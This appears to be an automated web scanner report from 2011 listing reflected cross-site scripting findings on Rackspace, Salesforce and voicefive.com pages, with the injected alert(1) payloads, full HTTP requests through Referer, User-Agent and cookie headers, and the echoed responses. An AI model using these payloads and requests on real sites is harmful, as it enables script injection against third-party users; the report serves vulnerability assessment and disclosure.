GET / HTTP/1.1 Host: www.rackspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=6ec9b"><script>alert(1)</script>da8f62fc3cd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bad"><script>alert(1)</script>f82d960bff2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.rackspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=f3bad"><script>alert(1)</script>f82d960bff2
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d3a"><a>9b48329261e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap404.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; Referer: http://www.google.com/search?hl=en&q=d8d3a"><a>9b48329261e
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2296a"><script>alert(1)</script>914d51e8ff9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128; Referer: http://www.google.com/search?hl=en&q=2296a"><script>alert(1)</script>914d51e8ff9
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... inks/7513/' + chatDepartment + '/&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/cloud_hosting_faq/&optionaldata3=cleanEntry&optionaldata4=http://www.google.com/search?hl=en&q=2296a"><script>alert(1)</script>914d51e8ff9&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)&optionaldata6=1ffb86d7e6309d5032693db6bb0255e1','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19ca"><script>alert(1)</script>ebca61dd64f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f19ca"><script>alert(1)</script>ebca61dd64f Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66284
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... /&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/cloud_hosting_faq/&optionaldata3=cleanEntry&optionaldata4=&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f19ca"><script>alert(1)</script>ebca61dd64f&optionaldata6=1ffb86d7e6309d5032693db6bb0255e1','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd1a6'-alert(1)-'28e71cbeb8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sat, 05 Feb 2011 15:52:55 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=bd1a6'-alert(1)-'28e71cbeb8a'; } </script> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 5bc1b<script>alert(1)</script>deb4f4248f3 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810; BMX_3PC=15bc1b<script>alert(1)</script>deb4f4248f3
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:46:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13948
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... ecExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "BMX_3PC": '15bc1b<script>alert(1)</script>deb4f4248f3', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 94e8f<script>alert(1)</script>636a257fa93 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-129445681094e8f<script>alert(1)</script>636a257fa93
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... )();}COMSCORE.BMX.Buddy.cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-129445681094e8f<script>alert(1)</script>636a257fa93', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload e8790<script>alert(1)</script>682ad76113e was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&e8790<script>alert(1)</script>682ad76113e; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&e8790<script>alert(1)</script>682ad76113e', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:1 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 54c1e<script>alert(1)</script>c25f16d737 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&54c1e<script>alert(1)</script>c25f16d737; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13930
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... load); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&54c1e<script>alert(1)</script>c25f16d737', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sa ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload d22e2<script>alert(1)</script>4e5992fd5 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&d22e2<script>alert(1)</script>4e5992fd5; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13929
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&d22e2<script>alert(1)</script>4e5992fd5' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1296920485";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"ExcludeUrl ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 2b912<script>alert(1)</script>27c4006c9b3 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2b912<script>alert(1)</script>27c4006c9b3; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
